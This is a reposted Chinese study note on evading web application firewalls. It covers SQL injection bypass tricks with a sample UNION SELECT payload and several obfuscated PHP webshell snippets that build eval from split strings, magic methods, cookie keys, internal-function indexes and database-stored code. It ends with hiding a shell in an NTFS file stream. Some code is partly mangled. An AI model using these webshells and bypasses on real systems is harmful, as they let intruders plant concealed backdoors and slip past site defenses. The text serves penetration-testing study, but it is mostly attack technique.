注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!! WAF: WEB应用防护系统(网站应用级防御系统) waf会拦截恶意传参,但并不是所有的拦截都是waf干的
注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
WAF:
WEB应用防护系统(网站应用级防御系统)
waf会拦截恶意传参,但并不是所有的拦截都是waf干的
硬件waf、软件waf、云waf
WAF检测机制的核心就是正则表达式
测试环境
系统:win2008R2
最新版安全狗:
一、常见绕WAF手法
Bypass SQL
大小写绕过(很老的waf才有用)
替换绕过
特殊字符绕过(%0a换行) \sleep() \updataxml()
编码绕过(利用检测机制的不同,通过编码绕过)
等价替换(利用其他函数替换
注释 数据库中是注释的意思
内联注释 当数据库版本大于5001执行
容器特征(apche的hpp、或者是iis的%分割)
iis传参里面 s%e%l%e%c%t => select
apche参数污染,传两个参数,以后一个参数为准
id=PHPinfo()
白名单(管理员权限或者是127.0.0.1本地不拦截、文件后缀名)
缓冲区(数据太多超过waf检测范围)
安全狗一般检测4000个
?id= 1 uNIOn select 1,2,3,4
二、绕WAF写码
Bypass webshell
非常的难以置信,这个竟然没有拦截
4、变量覆盖绕过
php $a="ev"; $b="al"; $c=$a$b; $d="c";
$$d($_REQUEST[8]); ?>
函数绕过
魔术方法绕过
name"); } } $user = new User(); $user->name="$_REQUEST[8]"; ?>
类方法绕过
foreach($COOKIE as $key=> $value){
if($key=='eval'){
$key($REQUEST[8])
}
}?>
内置函数
$a=get_defined_functions();
$a[internal][841]($_REQUEST[1])
?>
绕WAF终极手法,连接外部数据库hjw,获取info表中的第一行数据eval($_REQUEST[8])
eval(Mysqli_fetch_assoc(mysqli_query(mysql_connect('127.0.0.1','root','root','hjw123'),'select * from info'))['info']) //键为info的地方
?>
拿到shell之后藏shell的妙招ntf文件流
一、echo "" >> /:123.txt
二、
来源地址:https://blog.csdn.net/qq_58000413/article/details/127524510
--结束END--
本文标题: bypass绕WAF
本文链接: https://lsjlt.com/news/417308.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0